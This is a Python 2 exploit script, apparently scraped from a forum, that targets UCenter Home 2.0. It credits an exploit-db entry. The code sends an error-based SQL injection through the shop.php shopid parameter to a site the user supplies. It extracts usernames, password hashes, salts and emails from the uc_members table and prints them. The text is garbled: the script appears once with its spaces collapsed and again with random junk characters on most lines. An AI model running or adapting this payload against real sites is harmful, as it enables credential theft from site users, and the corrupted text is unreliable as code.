#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
! j) s2 Z) x/ p0 \! n% s) ~
4 F, C" B3 N3 O: o
' r, ]1 n' p8 `3 @1 s+ }: i6 R#!/usr/bin/env python
! P. q l; k6 Z' H$ y' p 3 C0 E- [( `7 K' V
import sys H& p3 P( P* Q G3 J7 _# A
import urllib2
* S: e* z, n+ t C4 C% Yimport re 3 ]7 P4 |5 M9 h2 |3 ^8 _
* U% n6 Z0 E: ?( n: bdef info():
, H% V" F2 o5 Y$ D/ p print 'From:http://www.exploit-db.com/exploits/14997/' ( e4 E* I4 W" y% j
print 'http://www.hake.cc/Web_loudong/'
1 }: B3 y$ e* J3 s0 @ print 'changed:qiaoy' - t7 f# B4 `8 v! p ~! B4 m6 p( }) `
print 'exp:'
9 K4 h0 V) G% k8 s; Z print ' ./UCenter_Home_2.0.py site'
" r v" K5 D# B( ]4 a- V% |& r; Y3 }- K " |: ~1 s4 r8 i) N, R: f! c, \- {
def main(): ! P" \7 o* u/ Y* ?4 P: f4 i7 E+ N
if len(sys.argv) != 2: ; K4 E5 u- f) N8 z; ]3 |
info() / O* j1 R5 ^2 j
else: ) i7 E$ b }5 S/ W$ h, L0 `
site = sys.argv[1]
, o+ v" M% t+ h$ x if site[0:7] == 'http://': 2 }, }: y/ a2 z( k; ^2 C
sitesite =site
. X9 h* T. C$ l( v elif site[0:8] == 'https://':
0 M. N, {% @/ Q5 R sitesite = site , r c. N4 z. S; d( v! B
else:
( y* a% k# I! s5 L f+ Z3 ~0 n site = 'http://'+site
$ B8 L- t/ `0 d$ S& n C* {% ^! ~/ D( R try: $ ?5 u7 o* X* V9 E
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
- J3 ^+ h& @; |4 ]' z1 b. U% y+ ~1 w9 { Value = urllib2.urlopen(url).read()
/ w+ t1 B7 ]( H5 p+ q$ d# b% D Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] . L8 b7 j, ?1 V$ i
hacked = Msg.split(':')
% v2 P! a8 I/ i& N print 'Name: '+hacked[1] O$ s; H: `, n7 S
print 'Passwd: '+hacked[2]
; V0 J5 U% S2 F6 u8 B8 \( F print 'salt: '+hacked[3] $ O" R E, \6 e7 N- y# e
print 'email: '+hacked[4]
! z# O2 o- c* L5 x except:
* o6 z& z' O- ]7 t" \- _ print 'Sorry,I can\'t work............'
. @5 z/ d( [& M- ]- V$ |
: C4 ?* l1 _. u3 o: lif __name__ == '__main__': / z4 B# m8 i: j& }! T0 }
main() |